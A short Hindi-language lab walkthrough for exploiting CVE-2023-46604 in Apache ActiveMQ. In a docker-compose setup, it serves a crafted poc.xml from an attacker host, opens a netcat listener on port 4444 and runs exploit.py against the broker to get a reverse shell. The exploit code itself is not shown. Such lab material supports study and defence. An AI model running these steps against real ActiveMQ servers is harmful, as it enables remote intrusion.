
Apache ActiveMQ में CVE-2023-46604 के लिए एक्सप्लॉइट, क्राफ्टेड XML पेलोड और रिवर्स शेल स्थापना के माध्यम से रिमोट कोड निष्पादन सक्षम करता है।
CVE-2023-46604

आवश्यक वातावरण के अनुसार पीड़ित मशीन और लक्ष्य मशीन वाले 2 इमेज का docker-compose तैयार करें पीड़ित मशीन पर, ActiveMQ प्रारंभ करें
हमलावर मशीन पर जाएँ: • POC भेजने के लिए HTTP सेवा खोलें: python3 -m http.server
• हमलावर मशीन से कनेक्शन सुनने के लिए netcat का उपयोग करें nc -nlvp 4444
• हमलावर मशीन पर रिवर्स शेल कनेक्शन बनाने के लिए पेलोड भेजें python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml जहाँ:
यह देखा जा सकता है कि ‘exploit.py’ फ़ाइल को निष्पादित करने के बाद, शोषण कोड वेब सर्वर पर एक 'poc.xml' पैकेट लक्ष्य पर भेजता है, जो लक्ष्य सर्वर पर चल रहे ActiveMQ सेवा का पता है। साथ ही, हमलावर मशीन पर HTTP वेबसर्वर को लक्ष्य मशीन के आईपी पते से भेजा गया अनुरोध प्राप्त होता है।
पेलोड भेजने के बाद, हमलावर मशीन के पोर्ट 4444 पर सुन रहे टर्मिनल पर जाएँ। हम देखते हैं कि पीड़ित मशीन का रिवर्स शेल वापस भेज दिया गया है।